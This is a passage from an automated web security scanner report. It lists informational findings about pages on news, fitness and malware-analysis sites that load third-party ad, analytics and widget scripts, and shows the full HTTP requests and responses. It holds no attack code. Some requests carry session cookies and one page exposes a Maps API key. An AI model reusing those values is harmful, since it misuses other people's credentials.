PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
X-rt: u p20078 f4673 d0 b
Cache-Control: public, max-age=0
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 02:34:02 GMT
ETag: 63646b7a953806c54be033753debe7a3
Y-Content-Length: 30262 30262
Server: lighttpd/1.4.19
X-Cache: MISS from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 30262
Date: Thu, 03 Feb 2011 02:34:02 GMT
X-Varnish: 191004756
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</a><script type="text/javascript" src="http://ctn.mywot.com/badge/robtex.com?orientation=horizontalsmall&file=js"></script>
...[SNIP]...
</a><script src="http://www.link-gadget.com/j.js"></script>
...[SNIP]...

18.887. http://www.scmagazineus.com/search/xss/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scmagazineus.com
Path:	/search/xss/

Issue detail

The response dynamically includes the following scripts from other domains:

http://jlinks.industrybrains.com/jsct?sid=918&ct=SCMAGAZINE_ROS&num=4&layt=624x300&fmt=simp
http://secure-us.imrworldwide.com/v53.js
http://www.google.com/afsonline/show_afs_ads.js

Request

GET /search/xss/ HTTP/1.1
Host: www.scmagazineus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 141030
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mvgyxq45tfklwbr1ryqgwde3; path=/; HttpOnly
From: Web2-VM
Date: Thu, 03 Feb 2011 04:05:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.google.com/afsonline/show_afs_ads.js">
</script>
...[SNIP]...
<div id="marchexLinks">
<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=918&ct=SCMAGAZINE_ROS&num=4&layt=624x300&fmt=simp"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

18.888. http://www.shape.com/workouts/articles/blood_sugar.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/blood_sugar.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js
http://serve.a-widget.com/kickFlash/scripts/swfobject2.js

Request

GET /workouts/articles/blood_sugar.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 01 Feb 2011 14:33:57 GMT
Server: Apache
Cache-Control: max-age=900
Location: http://www.shape.com/workouts/articles/blood-sugar.html
X-Server-Name: (null)
ETag: "1296570837"
Last-Modified: Tue, 01 Feb 2011 14:33:57 +0000
X-Powered-By: PHP/5.2.9
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 01 Feb 2011 14:48:56 GMT
Content-Type: text/html; charset=utf-8
Age: 2
Via: 1.1 mdw107101 (MII-APC/1.6)
Connection: close
Content-Length: 27153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
</script>
<script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js"> </script>
...[SNIP]...

18.889. http://www.shape.com/workouts/articles/workout_schedule.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/workout_schedule.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js
http://serve.a-widget.com/kickFlash/scripts/swfobject2.js

Request

GET /workouts/articles/workout_schedule.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 01 Feb 2011 14:33:57 GMT
Server: Apache
Cache-Control: max-age=900
Location: http://www.shape.com/workouts/articles/workout-schedule.html
X-Server-Name: (null)
ETag: "1296570837"
Last-Modified: Tue, 01 Feb 2011 14:33:57 +0000
X-Powered-By: PHP/5.2.9
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 01 Feb 2011 14:48:56 GMT
Content-Type: text/html; charset=utf-8
Age: 0
Via: 1.1 mdw107102 (MII-APC/1.6)
Connection: close
Content-Length: 27158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
</script>
<script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js"> </script>
...[SNIP]...

18.890. http://www.stocktrader.org.uk/remote2/ST1-2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stocktrader.org.uk
Path:	/remote2/ST1-2.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

Response

18.891. http://www.stocktrader.org.uk/widgets/stock-trader-scroller-1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stocktrader.org.uk
Path:	/widgets/stock-trader-scroller-1.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://currency.me.uk/remote/ER-BAR-1.php
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /widgets/stock-trader-scroller-1.html HTTP/1.1
Host: www.stocktrader.org.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:17:18 GMT
Server: Apache/2.0.63 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 12844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Stock Trader Scroller 1 | Wid
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://currency.me.uk/remote/ER-BAR-1.php"></script>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.892. http://www.techmynd.com/cross-site-scripting-attacks-xss/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.techmynd.com
Path:	/cross-site-scripting-attacks-xss/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_ifrm.js
http://cdn.wibiya.com/Toolbars/dir_0045/Toolbar_45689/Loader_45689.js
http://media.fastclick.net/w/get.media?sid=56897&tp=7&d=j&t=n
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://resources.infolinks.com/js/infolinks_main.js
http://tcr.tynt.com/javascripts/Tracer.js?user=akcmnu-YCr3RhSadbiUt4I&s=33&lang=en
http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/techmynd.json?callback=twitterCallback2&count=3
http://widgets.amung.us/small.js

Request

GET /cross-site-scripting-attacks-xss/ HTTP/1.1
Host: www.techmynd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:05:16 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 04:05:16 GMT
Accept-Ranges: bytes
Content-Length: 62295
Vary: Accept-Encoding,Cookie
X-Pingback: http://www.techmynd.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profile
...[SNIP]...
</script> <script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script> <script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div id="twitter_update_list"> <script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script> <script type="text/javascript" src="http://twitter.com/statuses/user_timeline/techmynd.json?callback=twitterCallback2&count=3"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_ifrm.js" charset="utf-8"></script> <br /><br /> <script language="javascript" src="http://media.fastclick.net/w/get.media?sid=56897&tp=7&d=j&t=n"></script>
...[SNIP]...
<div style="display:none;height:0;"> <script type="text/javascript" src="http://widgets.amung.us/small.js"></script>
...[SNIP]...
</div> <script src='http://cdn.wibiya.com/Toolbars/dir_0045/Toolbar_45689/Loader_45689.js' type='text/javascript'></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=akcmnu-YCr3RhSadbiUt4I&s=33&lang=en"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...

18.893. http://www.thefreedomtrail.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thefreedomtrail.org
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://www.google-analytics.com/urchin.js
http://www.trumba.com/k.aspx?calendar=freedom_trail_foundation_events&widget=upcoming&events=1

Request

GET / HTTP/1.1
Host: www.thefreedomtrail.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 13511
Content-Type: text/html
Content-Location: http://www.thefreedomtrail.org/index.html
Last-Modified: Wed, 05 Jan 2011 21:58:55 GMT
Accept-Ranges: bytes
ETag: "9cdc17bf23adcb1:6b9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 16:17:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
<meta name="google-site-verification" content=
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.trumba.com/k.aspx?calendar=freedom_trail_foundation_events&widget=upcoming&events=1"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=thefreedomtrail"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...

18.894. http://www.theroot.com/multimedia/50-years-black-history previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/multimedia/50-years-black-history

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jqueryui/1.6/jquery-ui.min.js
http://bunsen.wapolabs.com/identity/1.2.1/js/wapo_site_bottom.js
http://bunsen.wapolabs.com/identity/theroot/prod/1.2.1/js/wapo_identity.js
http://d.yimg.com/ds/badge2.js
http://downloads.mailchimp.com/js/jquery.form.js
http://downloads.mailchimp.com/js/jquery.validate.js
http://edge.quantserve.com/quant.js
http://js-kit.com/comments-count.js
http://js.adsonar.com/js/adsonar.js
http://media.washingtonpost.com/wp-adv/dm/nw/dm_client.js
http://media.washingtonpost.com/wp-srv/ad/root_ad.js
http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js
http://media3.washingtonpost.com/wp-srv/wapolabs/revplat/prod/1_4_1/js/

Request

GET /multimedia/50-years-black-history?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.895. http://www.theroot.com/views/2011/young-futurists previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/views/2011/young-futurists

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jqueryui/1.6/jquery-ui.min.js
http://blstj.msn.com/br/gbl/js/2/report.js
http://blstj.msn.com/br/gbl/js/4/mozcompat.js
http://blstj.msn.com/br/gbl/js/7/core.js
http://blstj.msn.com/br/gbl/js/7/navigation.js
http://blstj.msn.com/br/om/js/s_code.js
http://bunsen.wapolabs.com/identity/1.2.1/js/wapo_site_bottom.js
http://bunsen.wapolabs.com/identity/theroot/prod/1.2.1/js/wapo_identity.js
http://d.yimg.com/ds/badge2.js
http://downloads.mailchimp.com/js/jquery.form.js
http://downloads.mailchimp.com/js/jquery.validate.js
http://edge.quantserve.com/quant.js
http://hp.msn.com/scr/op/ol-fdbkv3_r1.js
http://js-kit.com/comments-count.js
http://js.adsonar.com/js/adsonar.js
http://media.washingtonpost.com/wp-adv/dm/nw/dm_client.js
http://media.washingtonpost.com/wp-srv/ad/root_ad.js
http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js
http://media3.washingtonpost.com/wp-srv/wapolabs/revplat/prod/1_4_1/js/

Request

GET /views/2011/young-futurists?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.896. http://www.theroot.com/views/meet-25-people-who-will-change-our-world previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/views/meet-25-people-who-will-change-our-world

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jqueryui/1.6/jquery-ui.min.js
http://bunsen.wapolabs.com/identity/1.2.1/js/wapo_site_bottom.js
http://bunsen.wapolabs.com/identity/theroot/prod/1.2.1/js/wapo_identity.js
http://d.yimg.com/ds/badge2.js
http://downloads.mailchimp.com/js/jquery.form.js
http://downloads.mailchimp.com/js/jquery.validate.js
http://edge.quantserve.com/quant.js
http://js-kit.com/comments-count.js
http://js.adsonar.com/js/adsonar.js
http://media.washingtonpost.com/wp-adv/dm/nw/dm_client.js
http://media.washingtonpost.com/wp-srv/ad/root_ad.js
http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js
http://media3.washingtonpost.com/wp-srv/wapolabs/revplat/prod/1_4_1/js/

Request

Response

18.897. http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theworkbuzz.com
Path:	/career-advice/women-cautious-about-social-media-and-work/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js?ver=3.0.4
http://blstj.msn.com/br/gbl/js/2/report.js?ver=3.0.4
http://blstj.msn.com/br/gbl/js/4/navigation.js?ver=3.0.4
http://platform.linkedin.com/in.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://w.sharethis.com/widget/?wp=2.6.1&publisher=16298438-73ee-4f37-8234-2c6423690e18
http://www.wildfireapp.com/website/302/companies/130300/widget_loader.js

Request

Response

18.898. http://www.theworkbuzz.com/employment-trends/video-interviews/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theworkbuzz.com
Path:	/employment-trends/video-interviews/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js?ver=3.0.4
http://blstj.msn.com/br/gbl/js/2/report.js?ver=3.0.4
http://blstj.msn.com/br/gbl/js/4/navigation.js?ver=3.0.4
http://platform.linkedin.com/in.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://w.sharethis.com/widget/?wp=2.6.1&publisher=16298438-73ee-4f37-8234-2c6423690e18
http://www.wildfireapp.com/website/302/companies/130300/widget_loader.js

Request

Response

18.899. http://www.threatexpert.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.threatexpert.com
Proxy-Connection: keep-alive
Referer: http://www.threatexpert.com/report.aspx?md5=57eb54a5e3fe2c152c3e438277376933
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0; __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmb=118387404; __utmc=118387404; __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:29:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 20288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
ThreatExp
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.900. http://www.threatexpert.com/azlisting.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/azlisting.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /azlisting.aspx HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 19:30:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
ThreatExp
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.901. http://www.threatexpert.com/catlisting.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/catlisting.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /catlisting.aspx HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 04:06:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.902. http://www.threatexpert.com/contact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/contact.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://maps.google.com/maps?file=api&v=2&key=ABQIAAAA6nzMhFBTRt-Xeyva8WxHYxTaMP2z32HhFoWjE7ArqYtw-HPfIhQecgvF8VkJ5lcDj-QjChKMV-oS-w
http://www.google-analytics.com/urchin.js

Request

GET /contact.aspx HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 04:06:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAA6nzMhFBTRt-Xeyva8WxHYxTaMP2z32HhFoWjE7ArqYtw-HPfIhQecgvF8VkJ5lcDj-QjChKMV-oS-w" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.903. http://www.threatexpert.com/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /default.aspx HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 04:05:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 20301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
ThreatExp
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.904. http://www.threatexpert.com/files/a.exe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/files/a.exe.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /files/a.exe.html HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Content-Length: 29873
Content-Type: text/html
Last-Modified: Mon, 01 Mar 2010 14:22:20 GMT
Accept-Ranges: bytes
ETag: "646fcb9a4ab9ca1:992"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 04:05:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>a.exe | Thre
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.905. http://www.threatexpert.com/files/b.exe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/files/b.exe.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /files/b.exe.html HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Content-Length: 29647
Content-Type: text/html
Last-Modified: Mon, 01 Mar 2010 14:28:47 GMT
Accept-Ranges: bytes
ETag: "4824814bb9ca1:992"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 04:05:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>b.exe | Thre
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.906. http://www.threatexpert.com/files/c.exe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/files/c.exe.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /files/c.exe.html HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Content-Length: 29518
Content-Type: text/html
Last-Modified: Mon, 01 Mar 2010 14:31:58 GMT
Accept-Ranges: bytes
ETag: "8c7acf34bb9ca1:992"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 04:05:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>c.exe | Thre
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.907. http://www.threatexpert.com/files/msa.exe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/files/msa.exe.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /files/msa.exe.html HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
